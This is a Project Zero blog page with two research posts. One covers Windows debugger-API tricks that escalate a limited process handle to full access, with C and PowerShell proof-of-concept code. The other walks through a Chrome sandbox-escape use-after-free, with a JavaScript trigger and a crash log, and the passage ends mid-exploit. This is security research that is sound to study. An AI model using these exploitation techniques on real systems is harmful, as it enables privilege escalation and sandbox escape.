Project Zero

News and updates from the Project Zero team at Google

Windows Exploitation Tricks: Abusing the User-Mode Debugger

16 April 2019 - 18:24
Posted by James Forshaw, Google Project Zero
I've recently been adding native user-mode debugger support to NtObjectManager. Whenever I add new functionality I have to do some research and reverse engineering to better understand how it works. In this case I wondered what access you need to debug an existing running process and through that noticed an interesting security mismatch between what the user-mode APIs expose and what the kernel actually does which I thought would be interesting to document. What I’ll describe is not a security vulnerability, but it is useful for exploiting certain classes of bugs, which is why it fits in my series on exploitation tricks.
I'm not going to go into any great depth about how the user-mode debugger works under the hood -- if you want to know more Alex Ionescu wrote 3 whitepapers (1, 2, 3) over 12 years ago about the internals on Windows XP, and the internals haven't really changed much since. Given that observation, while I'm documenting the behavior on Windows 10 1809, I'm confident these techniques work on earlier releases of Windows.

Attaching to a Running Process

Debugging on modern versions of Windows NT is based around the Debug kernel object, which you can create by calling the NtCreateDebugObject system call. This object acts as a bridge to assign processes for debugging and wait for debug events to be returned. The creation of this object is hidden from you by the Win32 APIs and each thread has its own debug object stored in its TEB.
If you want to attach to an existing process you can call the Win32 API DebugActiveProcess which has the prototype:
BOOL DebugActiveProcess(_In_ DWORD dwProcessId);
This ultimately calls the native API, NtDebugActiveProcess, which has the following prototype:
NTSTATUS NtDebugActiveProcess(
    _In_ HANDLE ProcessHandle,
    _In_ HANDLE DebugObjectHandle
);
The DebugObjectHandle comes from the TEB, but requiring a process handle rather than a PID results in a mismatch between the call semantics of the two APIs. This means the Win32 API is responsible for opening a handle to a process, then passing that to the native API.
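To see how the pieces fit together, here is a rough sketch of the Win32 wrapper (a simplified reconstruction, not the actual KernelBase code; the DbgUi prototypes are as commonly declared in third-party headers such as phnt, and the real API does additional work such as injecting the initial break-in thread):

#include <windows.h>
#include <winternl.h>

#ifndef NT_SUCCESS
#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)
#endif

// Undocumented ntdll exports which manage the per-thread debug object in the TEB.
extern "C" NTSTATUS NTAPI DbgUiConnectToDbg(VOID);
extern "C" HANDLE NTAPI DbgUiGetThreadDebugObject(VOID);
extern "C" NTSTATUS NTAPI NtDebugActiveProcess(HANDLE ProcessHandle, HANDLE DebugObjectHandle);

// The helper examined in the next snippet.
HANDLE ProcessIdToHandle(DWORD dwProcessId);

BOOL DebugActiveProcessSketch(DWORD dwProcessId) {
  // Create the calling thread's debug object (stored in the TEB) if it
  // doesn't already exist.
  if (!NT_SUCCESS(DbgUiConnectToDbg()))
    return FALSE;
  // Open the target with the wide access mask requested by the Win32 layer.
  HANDLE process = ProcessIdToHandle(dwProcessId);
  if (!process)
    return FALSE;
  NTSTATUS status = NtDebugActiveProcess(process, DbgUiGetThreadDebugObject());
  CloseHandle(process);
  return NT_SUCCESS(status);
}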
The question which immediately comes to mind when I see code like this is what access does the Win32 API require, and what does the kernel API actually enforce? This isn't just idle musing; a common place for security vulnerabilities to manifest is in mismatched assumptions between interface layers. A good example is the discovery that NTFS hardlinks required write access to the target when created from a Win32 application using CreateHardlink, because the user-mode API opened the target file with WRITE_ATTRIBUTES access. However, the kernel APIs didn't require any access (see my blog post about the hard link issue here), which allows you to hardlink to any file you can open for any access. To find out what the Win32 API and kernel APIs enforce we need to look at the code in a disassembler (or look at Alex's original write-ups, which have the code RE'd as well). The code in DebugActiveProcess calls a helper, ProcessIdToHandle, to get the process handle, which looks like the following:
HANDLE ProcessIdToHandle(DWORD dwProcessId) {
  NTSTATUS Status;
  OBJECT_ATTRIBUTES ObjectAttributes;
  CLIENT_ID ClientId;
  HANDLE ProcessHandle;
  DWORD DesiredAccess = PROCESS_CREATE_THREAD |
                        PROCESS_VM_OPERATION |
                        PROCESS_VM_READ |
                        PROCESS_VM_WRITE |
                        PROCESS_QUERY_INFORMATION |
                        PROCESS_SUSPEND_RESUME;

  ClientId.UniqueProcess = dwProcessId;
  InitializeObjectAttributes(&ObjectAttributes, NULL, ...);
  Status = NtOpenProcess(&ProcessHandle,
                         DesiredAccess,
                         &ObjectAttributes,
                         &ClientId);
  if (NT_SUCCESS(Status))
    return ProcessHandle;
  BaseSetLastNTError(Status);
  return NULL;
}
Nothing shocking about this code: a process is opened by its PID using NtOpenProcess. The code requires all the access rights that a debugger would expect:
  • Creating new threads, which is how the initial break point is injected.
  • Access to read and modify memory to write break points and inspect the running state of the process.
  • Suspending and resuming the entire process.
Once the kernel gets the process handle it needs to convert it back to a process object pointer using ObReferenceObjectByHandle. The API takes a desired access mask which is checked against the open handle's access mask, and only returns the pointer if the check succeeds. Here's the relevant snippet of code:
NTSTATUS NtDebugActiveProcess(HANDLE ProcessHandle,
                              HANDLE DebugObjectHandle) {
  PEPROCESS Process;
  NTSTATUS status = ObReferenceObjectByHandle(
             ProcessHandle,
             PROCESS_SUSPEND_RESUME,
             PsProcessType,
             KeGetCurrentThread()->PreviousMode,
             &Process);
  // ...
}
Here's a pretty big mismatch in security expectations. The user-mode API opens the process with much higher access than the kernel API requires; the kernel only enforces access to suspend and resume the target process. This makes sense from a kernel perspective (as Raymond Chen might say, looking at it through Kernel Colored Glasses), as the immediate effect of attaching a process to a debug object is to suspend the process. You'd assume that without having other access such as VM Read/Write there's not much debugging going on, but from a kernel perspective that's irrelevant. All you need to use the kernel APIs is the ability to suspend/resume the process (through NtDebugContinue) and read events from the debug object. The fact that you might get memory addresses in the debug events which you can't access isn't that important from a design perspective.
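This mismatch is easy to demonstrate by skipping the Win32 wrapper entirely. The following is a minimal sketch (assuming phnt-style prototypes for the undocumented native APIs, with error handling mostly omitted) which successfully attaches to a target opened with only PROCESS_SUSPEND_RESUME, an access mask DebugActiveProcess would never settle for:

#include <windows.h>
#include <winternl.h>

#ifndef NT_SUCCESS
#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)
#endif

// Undocumented prototypes, as declared in third-party headers such as phnt.
extern "C" NTSTATUS NTAPI NtCreateDebugObject(PHANDLE DebugObjectHandle,
                                              ACCESS_MASK DesiredAccess,
                                              POBJECT_ATTRIBUTES ObjectAttributes,
                                              ULONG Flags);
extern "C" NTSTATUS NTAPI NtDebugActiveProcess(HANDLE ProcessHandle,
                                               HANDLE DebugObjectHandle);

bool AttachWithSuspendResumeOnly(DWORD pid) {
  // PROCESS_SUSPEND_RESUME is the only access the kernel checks in
  // NtDebugActiveProcess.
  HANDLE process = OpenProcess(PROCESS_SUSPEND_RESUME, FALSE, pid);
  if (!process)
    return false;

  OBJECT_ATTRIBUTES oa;
  InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
  HANDLE debug_object = NULL;
  NTSTATUS status = NtCreateDebugObject(&debug_object, MAXIMUM_ALLOWED, &oa, 0);
  if (NT_SUCCESS(status)) {
    // Succeeds despite never opening the target for VM read/write or
    // thread creation.
    status = NtDebugActiveProcess(process, debug_object);
  }
  CloseHandle(process);
  return NT_SUCCESS(status);
}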
Where's the problem you might ask? With only PROCESS_SUSPEND_RESUME access you can "debug" a process with limited access, but without the rest of the access rights you'd not be able to do that much. What can we do if we have only PROCESS_SUSPEND_RESUME access?

Accessing Debug Events

The answer to the question is based on the event you receive when you first wait for a debug event, CREATE_PROCESS_DEBUG_INFO. Note the native structure is slightly different but it's close enough for our purposes.
The create process event is received whenever you connect to an active process; it allows the debugger to synchronize its state by providing a set of events, such as process creation, thread creation and loaded modules, that you'd have received if you were directly starting a process under a debugger. In fact NtDebugActiveProcess calls the method DbgkpPostFakeProcessCreateMessages, whose name gives away the faked-up nature of these debug events.
What's interesting about CREATE_PROCESS_DEBUG_INFO is that it contains the HANDLE members hFile, hProcess and hThread, corresponding to a file handle to the process executable, a handle to the process being debugged and finally a handle to the initial thread. Checking DbgkpPostFakeProcessCreateMessages, the objects are captured there; however the handles are not generated at that point. Instead the handles are created inside the NtWaitForDebugEvent system call, specifically in DbgkpOpenHandles. See if you can spot the problem with the following code snippet from that function:
NTSTATUS DbgkpOpenHandles(PDEBUG_EVENT Event,
                          EPROCESS DebugeeProcess,
                          PETHREAD DebugeeThread) {
  // Handle other event types first...
  if (Event->DebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {
    if (ObOpenObjectByPointer(DebugeeThread, 0, NULL,
          THREAD_ALL_ACCESS, PsThreadType,
          KernelMode, &Event->CreateProcess.hThread) < 0) {
      Event->CreateProcess.hThread = NULL;
    }

    if (ObOpenObjectByPointer(DebugeeProcess, 0, NULL,
          PROCESS_ALL_ACCESS, PsProcessType,
          KernelMode, &Event->CreateProcess.hProcess) < 0) {
      Event->CreateProcess.hProcess = NULL;
    }

    ObDuplicateObject(PsGetCurrentProcess(),
                      Event->CreateProcess.hFile,
                      PsGetCurrentProcess(),
                      &Event->CreateProcess.hFile, 0, 0,
                      DUPLICATE_SAME_ACCESS, KernelMode);
  }
  // ...
}
Did you spot the problem? This code is using the ObOpenObjectByPointer API to convert the debugee process and thread objects back to handles; that in itself is fine. However, the problem is that the API is called with the access mode set to KernelMode, which means the call does not perform any access checking. That's not great, but again it wouldn't be an issue if the code wasn't also requesting additional access above PROCESS_SUSPEND_RESUME. This code is effectively giving the caller of NtWaitForDebugEvent all access rights to the debugged target process.
The result of this behavior is that, given a process handle with PROCESS_SUSPEND_RESUME access, it's possible to use it to get full access to the process and initial thread, even if the objects themselves wouldn't grant the caller that access. It might be argued that "You've attached the debugger to the process, what did you expect?". Well I would expect the caller would need to have opened suitable process and thread handles before attaching the debugger and use them to access the target, or if the kernel has to create new handles, at least do an access check on them. This leads us to our first exploitation trick:
Exploitation trick: given a process handle with PROCESS_SUSPEND_RESUME access you can convert it to a full access process handle through the debugger APIs.
It's probably rare you'll encounter this type of bug, as PROCESS_SUSPEND_RESUME is considered write access to a process. Anything which would leak this access to a privileged process would also have leaked the other write accesses, such as PROCESS_CREATE_THREAD or PROCESS_VM_WRITE, and it'd be game over. To prove this exploitation trick works, the following is a simple PowerShell script which takes a process ID, opens the process for PROCESS_SUSPEND_RESUME, attaches it to a debugger, steals the handle and returns the full-access handle.
param(
    [Parameter(Mandatory)]
    [int]$ProcessId
)

# Get a privileged process handle with only PROCESS_SUSPEND_RESUME.
Import-Module NtObjectManager

Use-NtObject($dbg = New-NtDebug -ProcessId $ProcessId) {
    Use-NtObject($e = Start-NtDebugWait $dbg -Infinite) {
        $dbg.Detach($ProcessId)
        [NtApiDotNet.NtProcess]::DuplicateFrom($e.Process, -1)
    }
}
What about the third handle in CREATE_PROCESS_DEBUG_INFO, the handle to the process executable file? This has a different behavior: instead of opening a raw pointer it duplicates an existing handle. If you look at the code it seems to be duplicating from the current caller's process and back again, so why would it need to do the duplication if the handle was already in the debugger process? The key is the final parameter: again it's passing KernelMode, which means ObDuplicateObject will actually duplicate a kernel handle into the current process. The file handle is opened when attaching to the process and uses the following code:
HANDLE DbgkpSectionToFileHandle(PSECTION Section) {
  HANDLE FileHandle;
  UNICODE_STRING Name;
  OBJECT_ATTRIBUTES ObjectAttributes;
  IO_STATUS_BLOCK IoStatusBlock;

  MmGetFileNameForSection(Section, &Name);

  InitializeObjectAttributes(&ObjectAttributes,
      &Name,
      OBJ_CASE_INSENSITIVE |
      OBJ_FORCE_ACCESS_CHECK |
      OBJ_KERNEL_HANDLE);

  ZwOpenFile(&FileHandle, GENERIC_READ | SYNCHRONIZE,
             &ObjectAttributes, &IoStatusBlock,
             FILE_SHARE_ALL, FILE_SYNCHRONOUS_IO_NONALERT);
  return FileHandle;
}
This code is careful to pass OBJ_FORCE_ACCESS_CHECK to the file open call to ensure it doesn’t give the debugger access to arbitrary files. The file handle is stored away to be reclaimed by the later call to NtWaitForDebugEvent. This leads us to our second, and final exploitation trick:
Exploitation trick: with an arbitrary kernel handle closing bug you can steal kernel handles.
The rationale behind this exploitation trick is that once the handle is captured it's stored indefinitely, at least while the process still exists. The handle can be retrieved at any arbitrary point in time. This gives you a much bigger window to exploit a handle closing bug. An example of this bug class was one I found in a Novell driver, issue 274. In this case the driver wouldn't check whether ZwOpenFile succeeded when writing a log entry and so would reuse the handle value stored on the stack when it called ZwClose. This results in an arbitrary kernel handle being closed. To exploit the Novell bug using the debugger you'd do the following:
  1. Generate a log entry to create a kernel handle which is then closed. The value on the stack is not overwritten.
  2. Debug a process to get the file handle allocated. Handle allocation is predictable, so there's a good chance the debugger's file handle will be allocated with the same value as the stale one from step 1.
  3. Trigger the handle closing bug; in this case it'll close the existing value on the stack, which is now allocated by the debugger, resulting in a dangling handle value.
  4. Exercise code in the kernel to get the now unused handle value reallocated again. For example SepSetTokenCachedHandles called through NtCreateLowBoxToken will happily duplicate other kernel handles (although since I reported issue 483 there are fairly strict checks on what handles you can use).
  5. Get the debugger to return you the handle.

Handle closing bugs do exist, though they're perhaps rare. Also you have to be careful, as typically closing an already closed kernel handle can result in a bug check.

Wrapping Up
The behavior of user-mode debugging is another case where there are unexpected consequences to the design of the functionality. Nothing I’ve described here is a security vulnerability, but the behavior is interesting and it’s worth looking out for cases where it could be used.

Virtually Unlimited Memory: Escaping the Chrome Sandbox

11 April 2019 - 20:18
Posted by Mark Brand, Exploit Technique Archaeologist

Introduction

After discovering a collection of possible sandbox escape vulnerabilities in Chrome, it seemed worthwhile to exploit one of these issues as a full-chain exploit together with a renderer vulnerability to get a better understanding of the mechanics required for a modern Chrome exploit. Considering the available bugs, the most likely candidate appeared to be issue 1755, a use-after-free with parallels to classic Javascript engine callback bugs. This is a good candidate because of the high level of control the attacker has both over the lifetime of the free’d object, and over the timing of the later use of the object.
Apologies in advance for glossing over a lot of details about how the Mojo IPC mechanisms function - there’ll hopefully be some future blogposts explaining in more detail how the current Chrome sandbox interfaces look, but there’s a lot to explain!
For the rest of this blog post, we’ll be considering the last stable 64-bit release of Desktop Chrome for Windows before this issue was fixed, 71.0.3578.98.

Getting started

One of the most interesting things that we noticed during our research into the Chrome Mojo IPC layer is that it’s actually possible to make IPC calls directly from Javascript in Chrome! Passing the command line flag ‘--enable-blink-features=MojoJS’ to Chrome will enable this - and we used this feature to implement a Mojo fuzzer, which found some of the bugs reported.
Knowing about this feature, the cleanest way to implement a full Chrome chain would be to use a renderer exploit to enable these bindings in the running renderer, and then do our privilege elevation from Javascript!

Exploiting the renderer

_tsuro happened to have been working on an exploit for CVE-2019-5782, a nice bug in the v8 typer that was discovered by SOrryMybad and used at the Tian Fu Cup. I believe they have an upcoming blog post on the issue, so I’ll leave the details to them.
The bug resulted from incorrectly estimating the possible range of `arguments.length`; this can then be leveraged together with the Bounds-Check-Elimination (BCE) pass in the JIT. Exploitation is very similar to other typer bugs - you can find the exploit in ‘many_args.js’. Note that as a result of _tsuro’s work, the v8 team have removed the BCE optimisation to make it harder to exploit such issues in the typer!
The important thing here is that we’ll need to have a stable exploit - in order to launch the sandbox escape, we need to enable the Mojo bindings; and the easiest way to do this needs us to reload the main frame, which will mean that any objects we leave in a corrupted state will become fair game for garbage collection.

Talking to the Browser Process

Looking through the Chrome source code, we can see that the Mojo bindings are added to the Javascript context in RenderFrameImpl::DidCreateScriptContext, based on the member variable enabled_bindings_. So, to mimic the command line flag we can use our read/write to set that value to BINDINGS_POLICY_MOJO_WEB_UI, and force the creation of a new ScriptContext for the main frame and we should have access to the bindings!
It’s slightly painful to get hold of the RenderFrameImpl for the current frame, but by following a chain of pointers from the global context object we can locate chrome_child.dll, and find the global `g_frame_map`, which is a map from blink::Frame pointers to RenderFrameImpl pointers. For the purposes of this exploit, we assume that there is only a single entry in this map; but it would be simple to extend this to find the right one. It’s then trivial to set the correct flag and reload the page - see `enable_mojo.js` for the implementation.
Note that Chrome randomizes the IPC ordinals at build time, so in addition to enabling the bindings, we also need to find the correct ordinals for every IPC method that we want to call. This can be resolved in a few minutes of time in a disassembler of your choice; given that the renderer needs to be able to call these IPC methods, this is just a slightly annoying obfuscation that we could engineer around if we were trying to support more Chrome builds, but for the one version we’re supporting here it’s sufficient to modify the handful of javascript bindings we need:
var kBlob_GetInternalUUID_Name = 0x2538AE26;

var kBlobRegistry_Register_Name = 0x2158E98A;
var kBlobRegistry_RegisterFromStream_Name = 0x719E4F82;

var kFileSystemManager_Open_Name = 0x305E02BE;
var kFileSystemManager_CreateWriter_Name = 0x63B8D2A6;

var kFileWriter_Write_Name = 0x64D4FC1C;

The bug

So we’ve got access to the IPC interfaces from Javascript - what now?
The bug that we’re looking at is an issue in the implementation of the FileWriter interface of the FileSystem API. This is the interface description for the FileWriter interface, which is an IPC endpoint vended by the privileged browser process to the unprivileged renderer process to allow the renderer to perform brokered file writes to special sandboxed filesystems:
// Interface provided to the renderer to let a renderer write data to a file.
interface FileWriter {
  // Write data from |blob| to the given |position| in the file being written
  // to. Returns whether the operation succeeded and if so how many bytes were
  // written.
  // TODO(mek): This might need some way of reporting progress events back to
  // the renderer.
  Write(uint64 position, Blob blob) => (mojo_base.mojom.FileError result,
                                        uint64 bytes_written);

  // Write data from |stream| to the given |position| in the file being written
  // to. Returns whether the operation succeeded and if so how many bytes were
  // written.
  // TODO(mek): This might need some way of reporting progress events back to
  // the renderer.
  WriteStream(uint64 position, handle<data_pipe_consumer> stream) =>
        (mojo_base.mojom.FileError result, uint64 bytes_written);

  // Changes the length of the file to be |length|. If |length| is larger than
  // the current size of the file, the file will be extended, and the extended
  // part is filled with null bytes.
  Truncate(uint64 length) => (mojo_base.mojom.FileError result);
};
The vulnerability was in the implementation of the first method, Write. However, before we can properly understand the bug, we need to understand the lifetime of the FileWriter objects. The renderer can request a FileWriter instance by using one of the methods in the FileSystemManager interface:
// Interface provided by the browser to the renderer to carry out filesystem
// operations. All [Sync] methods should only be called synchronously on worker
// threads (and asynchronously otherwise).
interface FileSystemManager {
  // ...

  // Creates a writer for the given file at |file_path|.
  CreateWriter(url.mojom.Url file_path) =>
      (mojo_base.mojom.FileError result,
       blink.mojom.FileWriter? writer);

  // ...
};
The implementation of that function can be found here:
void FileSystemManagerImpl::CreateWriter(const GURL& file_path,
                                         CreateWriterCallback callback) {
  DCHECK_CURRENTLY_ON(BrowserThread::IO);

  FileSystemURL url(context_->CrackURL(file_path));
  base::Optional<base::File::Error> opt_error = ValidateFileSystemURL(url);
  if (opt_error) {
    std::move(callback).Run(opt_error.value(), nullptr);
    return;
  }
  if (!security_policy_->CanWriteFileSystemFile(process_id_, url)) {
    std::move(callback).Run(base::File::FILE_ERROR_SECURITY, nullptr);
    return;
  }

  blink::mojom::FileWriterPtr writer;
  mojo::MakeStrongBinding(std::make_unique<storage::FileWriterImpl>(
                              url, context_->CreateFileSystemOperationRunner(),
                              blob_storage_context_->context()->AsWeakPtr()),
                          MakeRequest(&writer));
  std::move(callback).Run(base::File::FILE_OK, std::move(writer));
}
The implication here is that if everything goes correctly, we’re returning a std::unique_ptr<storage::FileWriterImpl> bound to a mojo::StrongBinding. A strong binding means that the lifetime of the object is bound to the lifetime of the Mojo interface pointer - this means that the other side of the connection can control the lifetime of the object - and at any point where the code in storage::FileWriterImpl yields control of the sequence associated with that binding, the connection could be closed and the instance could be free’d.
This gives us a handle to the blink::mojom::FileWriter Mojo interface described here; the function of interest to us is the Write method, which has a handle to a blink::mojom::Blob as one of its parameters. We’ll look at this Blob interface again shortly.
With this in mind, it’s time to look at the vulnerable function.
void FileWriterImpl::Write(uint64_t position,
                           blink::mojom::BlobPtr blob,
                           WriteCallback callback) {
  blob_context_->GetBlobDataFromBlobPtr(
      std::move(blob),
      base::BindOnce(&FileWriterImpl::DoWrite, base::Unretained(this),
                     std::move(callback), position));
}
Now, it’s not immediately obvious that there’s an issue here; but in the Chrome codebase instances of base::Unretained which aren’t immediately obviously correct are often worth further investigation (this creates an unchecked, unowned reference - see Chrome documentation). So; this code can only be safe if GetBlobDataFromBlobPtr always synchronously calls the callback, or if destroying this will ensure that the callback is never called. Since blob_context_ isn’t owned by this, we need to look at the implementation of GetBlobDataFromBlobPtr, and the way in which it uses callback:
void BlobStorageContext::GetBlobDataFromBlobPtr(
    blink::mojom::BlobPtr blob,
    base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback) {
  DCHECK(blob);
  blink::mojom::Blob* raw_blob = blob.get();
  raw_blob->GetInternalUUID(mojo::WrapCallbackWithDefaultInvokeIfNotRun(
      base::BindOnce(
          [](blink::mojom::BlobPtr, base::WeakPtr<BlobStorageContext> context,
             base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback,
             const std::string& uuid) {
            if (!context || uuid.empty()) {
              std::move(callback).Run(nullptr);
              return;
            }
            std::move(callback).Run(context->GetBlobDataFromUUID(uuid));
          },
          std::move(blob), AsWeakPtr(), std::move(callback)),
      ""));
}
The code above is calling an asynchronous Mojo IPC method GetInternalUUID on the blob parameter that’s passed to it, and then (in a callback) when that method returns it’s using the returned UUID to find the associated blob data (GetBlobDataFromUUID), and calling the callback parameter with this data as an argument.
We can see that the callback is passed into the return callback for an asynchronous Mojo function exposed by the Blob interface:
// This interface provides access to a blob in the blob system.
interface Blob {
  // Creates a copy of this Blob reference.
  Clone(Blob& blob);

  // Creates a reference to this Blob as a DataPipeGetter.
  AsDataPipeGetter(network.mojom.DataPipeGetter& data_pipe_getter);

  // Causes the entire contents of this blob to be written into the given data
  // pipe. An optional BlobReaderClient will be informed of the result of the
  // read operation.
  ReadAll(handle<data_pipe_producer> pipe, BlobReaderClient? client);

  // Causes a subrange of the contents of this blob to be written into the
  // given data pipe. If |length| is -1 (uint64_t max), the range's end is
  // unbounded so the entire contents are read starting at |offset|. An
  // optional BlobReaderClient will be informed of the result of the read
  // operation.
  ReadRange(uint64 offset, uint64 length, handle<data_pipe_producer> pipe,
            BlobReaderClient? client);

  // Reads the side-data (if any) associated with this blob. This is the same
  // data that would be passed to OnReceivedCachedMetadata if you were reading
  // this blob through a blob URL.
  ReadSideData() => (array<uint8>? data);

  // This method is an implementation detail of the blob system. You should not
  // ever need to call it directly.
  // This returns the internal UUID of the blob, used by the blob system to
  // identify the blob.
  GetInternalUUID() => (string uuid);
};
This means that we can provide an implementation of this Blob interface hosted in the renderer process; pass an instance of that implementation into the FileWriter interface’s Write method, and we’ll get a callback from the browser process to the renderer process during the execution of GetBlobDataFromBlobPtr, during which we can destroy the FileWriter object. The use of base::Unretained here would be dangerous regardless of this callback, but having it scheduled in this way makes it much cleaner to exploit.

Step 1: A Trigger

First we need to actually reach the bug - this is a minimal trigger from Javascript using the MojoJS bindings we enabled earlier. A complete sample is attached to the bugtracker entry - the file is ‘trigger.js’
async function trigger() {
  // we need to know the UUID for a valid Blob
  let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
  Mojo.bindInterface(blink.mojom.BlobRegistry.name,
                     mojo.makeRequest(blob_registry_ptr).handle, "process");

  let bytes_provider = new BytesProviderImpl();
  let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();
  bytes_provider.binding.bind(mojo.makeRequest(bytes_provider_ptr));

  let blob_ptr = new blink.mojom.BlobPtr();
  let blob_req = mojo.makeRequest(blob_ptr);

  let data_element = new blink.mojom.DataElement();
  data_element.bytes = new blink.mojom.DataElementBytes();
  data_element.bytes.length = 1;
  data_element.bytes.embeddedData = [0];
  data_element.bytes.data = bytes_provider_ptr;

  await blob_registry_ptr.register(blob_req, 'aaaa', "text/html", "", [data_element]);

  // now we have a valid UUID, we can trigger the bug
  let file_system_manager_ptr = new blink.mojom.FileSystemManagerPtr();
  Mojo.bindInterface(blink.mojom.FileSystemManager.name,
                     mojo.makeRequest(file_system_manager_ptr).handle, "process");

  let host_url = new url.mojom.Url();
  host_url.url = window.location.href;

  let open_result = await file_system_manager_ptr.open(host_url, 0);

  let file_url = new url.mojom.Url();
  file_url.url = open_result.rootUrl.url + '/aaaa';
  let create_writer_result = await file_system_manager_ptr.createWriter(file_url);
  let file_writer = create_writer_result.writer;
  function BlobImpl() {
    this.binding = new mojo.Binding(blink.mojom.Blob, this);
  }

  BlobImpl.prototype = {
    getInternalUUID: async (arg0) => {
      // here we free the FileWriterImpl in the callback
      create_writer_result.writer.ptr.reset();

      return {'uuid': 'aaaa'};
    }
  };

  let blob_impl = new BlobImpl();
  let blob_impl_ptr = new blink.mojom.BlobPtr();
  blob_impl.binding.bind(mojo.makeRequest(blob_impl_ptr));

  file_writer.write(0, blob_impl_ptr);
}

Step 2: Replacement

Although it’s likely not to be of much use in the end, I usually like to start the process of exploiting a use-after-free by replacing the object with completely attacker controlled data - although without an ASLR bypass or an information leak, it’s unlikely we can do anything useful with this primitive, but it’s often useful to get an understanding of the allocation patterns around the object involved, and it gives a clear crash that’s useful to demonstrate the likely exploitability of the issue.
On the Windows build that we’re looking at, the size of the FileWriterImpl is 0x140 bytes. I originally looked at using the Javascript Blob API directly to create allocations, but this causes a number of additional temporary allocations of the same size, which significantly reduces reliability. A better way to cause allocations of a controlled size with controlled data in the browser process is to register new Blobs using the BlobRegistry registerFromStream method - this will perform all of the secondary allocations during the initial call to registerFromStream, and we can then trigger a single allocation of the desired size and contents later by writing data into the DataPipeProducerHandle.
We can test this (see ‘trigger_replace.js’), and indeed it does reliably replace the free’d object with a buffer containing completely controlled bytes, and crashes in the way we’d expect:
(1594.226c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chrome!storage::FileSystemOperationRunner::GetMetadata+0x33:
00007ffc`362a1a99 488b4908        mov     rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????
0:002> r
rax=0000ce61f98b376e rbx=0000021b30eb4bd0 rcx=2323232323232323
rdx=0000021b30eb4bd0 rsi=0000005ae4ffe3e0 rdi=2323232323232323
rip=00007ffc362a1a99 rsp=0000005ae4ffe2f0 rbp=0000005ae4ffe468
 r8=0000005ae4ffe35c  r9=0000005ae4ffe3e0 r10=0000021b30badbf0
r11=0000000000000000 r12=0000000000000000 r13=0000005ae4ffe470
r14=0000000000000001 r15=0000005ae4ffe3e8
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
chrome!storage::FileSystemOperationRunner::GetMetadata+0x33:
00007ffc`362a1a99 488b4908        mov     rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????
0:002> k
 # Child-SP          RetAddr           Call Site
00 0000005a`e4ffe2f0 00007ffc`362a74ed chrome!storage::FileSystemOperationRunner::GetMetadata+0x33
01 0000005a`e4ffe3a0 00007ffc`362a7aef chrome!storage::FileWriterImpl::DoWrite+0xed
…

Step 3: Information Leak

It’s not much use controlling the data in the free’d object when we need to be able to put valid pointers in there - so at this point we need to consider how the free’d object is used, and what options we have for replacing the free’d object with a different type of object, essentially turning the use-after-free into a type-confusion in a way that will achieve something useful to us.
Looking through objects of the same size in windbg however did not provide any immediate answers - and since most of the methods being called from DoWrite are non-virtual, we actually need quite a large amount of structure to be correct in the replacing object.
void FileWriterImpl::DoWrite(WriteCallback callback,
                             uint64_t position,
                             std::unique_ptr<BlobDataHandle> blob) {
  if (!blob) {
    std::move(callback).Run(base::File::FILE_ERROR_FAILED, 0);
    return;
  }
  // FileSystemOperationRunner assumes that positions passed to Write are always
  // valid, and will NOTREACHED() if that is not the case, so first check the
  // size of the file to make sure the position passed in from the renderer is
  // in fact valid.
  // Of course the file could still change between checking its size and the
  // write operation being started, but this is at least a lot better than the
  // old implementation where the renderer only checks against how big it thinks
  // the file currently is.
  operation_runner_->GetMetadata(
      url_, FileSystemOperation::GET_METADATA_FIELD_SIZE,
      base::BindRepeating(&FileWriterImpl::DoWriteWithFileInfo,
                          base::Unretained(this),
                          base::AdaptCallbackForRepeating(std::move(callback)),
                          position, base::Passed(std::move(blob))));
}
So; we’re going to make a non-virtual call to FileSystemOperationRunner::GetMetadata with a this pointer taken from inside the free’d object:
OperationID FileSystemOperationRunner::GetMetadata(
    const FileSystemURL& url,
    int fields,
    GetMetadataCallback callback) {
  base::File::Error error = base::File::FILE_OK;
  std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(
      file_system_context_->CreateFileSystemOperation(url, &error));
  ...
}
And that will then make a non-virtual call to FileSystemContext::CreateFileSystemOperation with a this pointer taken from inside whatever the previous this pointer pointed to…
FileSystemOperation* FileSystemContext::CreateFileSystemOperation(
    const FileSystemURL& url, base::File::Error* error_code) {
  ...

  FileSystemBackend* backend = GetFileSystemBackend(url.type());
  if (!backend) {
    if (error_code)
      *error_code = base::File::FILE_ERROR_FAILED;
    return nullptr;
  }

  ...
}
Which will then finally expect to be able to lookup a FileSystemBackend pointer from an std::map contained inside it!
FileSystemBackend* FileSystemContext::GetFileSystemBackend(
    FileSystemType type) const {
  auto found = backend_map_.find(type);
  if (found != backend_map_.end())
    return found->second;
  NOTREACHED() << "Unknown filesystem type: " << type;
  return nullptr;
}
This is quite a comprehensive set of constraints. (If we can meet them all, the call to backend->CreateFileSystemOperation is finally a virtual call which would be where we’d hope to achieve a useful side-effect).
After looking through the types of the same size (0x140 bytes), nothing jumped out as being both easy to allocate in a controlled way and also overlapping in a compatible way - so we can instead consider an alternative approach. On Windows, the freeing of a heap block doesn’t (immediately) corrupt the data it contains - so if we can groom to make sure that the FileWriterImpl allocation isn’t reused, we can instead replace the FileSystemOperationRunner object directly, and access it through the stale pointer. This removes one dereference from our constraints, and means we are looking in a different size class (0x80 bytes)… There are roughly 1000 object types of this size, and again nothing is obviously useful, so maybe we can consider alternative solutions...

Step 4: Information Leak (round #2)

Tired of staring at structure layouts in the debugger, it was time to consider any alternative we could come up with. The ASLR implementation on Windows means that if the same library is loaded in multiple processes, it will be at the same base address; so any library loaded in the renderer will be loaded at a known address in the browser process.
There are a few objects we could replace the FileSystemOperationRunner with that would line up the FileSystemContext pointer to controlled string data; we could use this to fake the first/begin node of the backend_map_ with a pointer into the data section of one of the modules that we can locate, and then line things up correctly so that we could lookup the first entry. This only required an even smaller set of constraints:
ptr = getPtr(address)
getUint8(ptr + 0x19) == 0
